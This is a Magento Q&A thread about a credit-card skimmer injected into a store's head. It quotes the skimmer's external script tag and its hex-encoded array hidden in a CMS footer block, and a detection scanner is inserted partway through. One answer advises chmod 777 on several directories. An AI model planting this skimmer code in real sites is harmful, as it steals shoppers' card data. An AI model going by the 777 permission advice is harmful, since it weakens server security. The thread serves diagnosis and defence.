Magento Asked by Casey on October 25, 2020
I can’t seem to locate how this script is getting into the head section of my site but it’s stealing credit cards. I’ve grepped the entire codebase and searched the entire database for “seooptimization” and found nothing so it must be added via createElement somewhere? What’s interesting is it’s added in the middle of all my theme js files. Can anyone help me track this down and figure out how to avoid it getting into the head of my site because I’ve chased it around for months now. I’ve removed it from the cms_block in the database, from miscellaneous scripts in the admin and they just keep finding new ways to put it on the site, now I can’t even track it down to get it off. Here’s what it looks like.
<script src="https://mage-seooptimization.com/events" id="magento-init"></script>
EDIT: So I finally was able to remove this. I found it in the database in one of my footer blocks in the cms_block table. It was disguised as follows:
<script>var meta_tags = ["0604104A124B2257060A0F021D1605114537","4B030D1849001802451A57514D014C164C0604181E040D59124A5D50", "19034A475057444D120B0405190E5E090D090002101F0B4C1A", "11110A04001B1C5E0C0C0E040E36164D1131192B50591E140B", "0245065705191A05080704154D0F1117420B5C12571317070B15", "15200E0F0C1317044D4519020410001145435A1757030016", "3111161808140C04004A4D12041A5749", "570D161E1105435F4A0F0B06135403000D051102101D0C180B151F161E4B01050C591C06000C1E1251504B", "114B110F15370D04170B0814021C58420B0E465A5E1D04050F0F0216", "5D0C0C031551504B014C0204171D5E04121A04181D33", "180C0E0E4917504B07100F001D044B"];</script>
Maybe someone can comment on how that could possibly end up being a script in the head section of the site?
Also, this doesn’t solve how it got there in the first place. Are there any known methods to inject code into the database for Magento 2.2.6 that may need patched? As far as I know I have all available patches applied.
List of enabled modules:
Aitoc_DimensionalShipping | EkoUK_ImageCleaner | Experius_WysiwygDownloads | FishPig_WordPress | FishPig_WordPress_RelatedProducts | MagePal_GuestToCustomer | MagePsycho_Customshipping | Amasty_Base | Amazon_Core | Amazon_Login | Amazon_Payment | FME_Faqs | Bold_OrderComment | Klarna_Core | Klarna_Ordermanagement | Magefan_LoginAsCustomer | Amasty_CronScheduleList | FME_Prodfaqs | Amasty_GiftCard | Klarna_Kp | Ebizmarts_MailChimp | Dotdigitalgroup_Email | Mageplaza_Core | Mageplaza_Smtp | Magiccart_Alothemes | Magiccart_Magicmenu | Magiccart_Magicproduct | Magiccart_Magicslider | Magiccart_Shopbrand | Magiccart_Testimonial | Mirasvit_Core | Mirasvit_Misspell | Mirasvit_Report | Mirasvit_Search | Mirasvit_SearchAutocomplete | Mirasvit_SearchLanding | Mirasvit_SearchMysql | Mirasvit_SearchReport | Mirasvit_SearchSphinx | Mirasvit_SearchUltimate | ShipWorks_Module | Temando_Shipping | VNS_Custom | Vertex_Tax | WeltPixel_Backend | WeltPixel_Maxmind |
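The search for "seooptimization" in the question found nothing because the payload was stored in cms_block as an array of hex strings, so a keyword match cannot see it. As an added example (not part of the original post), this Python scanner flags script blocks in exported CMS content by shape instead: external script hosts outside an allowlist, and inline scripts carrying several long hex-only string literals. The allowlist hosts and the row layout are assumptions, and the sample hex strings are shortened from the ones in the post.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts this store legitimately loads scripts from (hypothetical names).
ALLOWED_SCRIPT_HOSTS = {"www.example-store.test", "js.example-cdn.test"}
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
# A quoted string of 16+ hex digits only: the shape of the encoded array in the post.
HEX_LITERAL_RE = re.compile(r"""["']([0-9A-Fa-f]{16,})["']""")


def scan_content(content, min_hex_literals=3):
    """Return a list of (reason, detail) findings for one CMS content value."""
    findings = []
    for attrs, body in SCRIPT_RE.findall(content):
        src = SRC_RE.search(attrs)
        if src:
            host = urlparse(src.group(1)).hostname or ""
            if host and host not in ALLOWED_SCRIPT_HOSTS:
                findings.append(("external-script", host))
        hex_literals = HEX_LITERAL_RE.findall(body)
        if len(hex_literals) >= min_hex_literals:
            findings.append(("hex-array", f"{len(hex_literals)} hex literals"))
    return findings


def scan_rows(rows):
    """rows: iterable of (table, row_id, content). Returns only rows with findings."""
    report = {}
    for table, row_id, content in rows:
        hits = scan_content(content or "")
        if hits:
            report[(table, row_id)] = hits
    return report


# Constructed sample rows, shaped like an export of cms_block (id, content).
SAMPLE_ROWS = [
    ("cms_block", 1, "<p>Free shipping on orders over $50</p>"),
    ("cms_block", 2, '<script src="https://js.example-cdn.test/a.js"></script>'),
    ("cms_block", 3, '<script>var meta_tags = ["0604104A124B2257060A0F02", '
                     '"3111161808140C04004A4D12", "180C0E0E4917504B07100F00"];</script>'),
    ("cms_block", 4, '<script src="https://mage-seooptimization.com/events" id="magento-init"></script>'),
]

if __name__ == "__main__":
    for key, hits in scan_rows(SAMPLE_ROWS).items():
        print(key, hits)
```

The same function can be pointed at any table that holds admin-editable HTML, such as the miscellaneous scripts setting the question mentions, by feeding its rows in the same (table, id, content) form.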
I have encountered the same issue. It was injecting a fake payment section in the checkout page. This time the link was different though. I was able to remove the code using the header block editor in the admin. But I'm kind of sure it will happen again. Anyway, going to update the whole thing and put a paid firewall service. If anybody finds a solution to this, it'd be very helpful. Thanks.
Answered by Mathew on October 25, 2020
Facing the same thing and I have about 70% of the same modules as you!!! Did you ever find out which module led to the vulnerability?
Answered by Jojo on October 25, 2020
php bin/magento module:status | grep -v Magento | grep -v List | grep -v None | grep -v -e '^$'| xargs php bin/magento module:disable
Answered by Denys Belevtsov on October 25, 2020
First of all scan your website with the available tools like
then you will get some idea on malware and security issues for your website.
Please ask your hosting provider for a detailed report on website security.
You can check Magento file and folder permissions as well from your end and make them proper by running the following commands:
find . -type f -exec chmod 644 {} \; # 644 permission for files
find . -type d -exec chmod 755 {} \; # 755 permission for directory
find ./var -type d -exec chmod 777 {} \; # 777 permission for var folder
find ./pub/media -type d -exec chmod 777 {} \;
find ./pub/static -type d -exec chmod 777 {} \;
chmod 777 ./app/etc
chmod 644 ./app/etc/*.xml
Hope this will help you, and please share an update after this activity so I can guide you on the next step.
Answered by Jack on October 25, 2020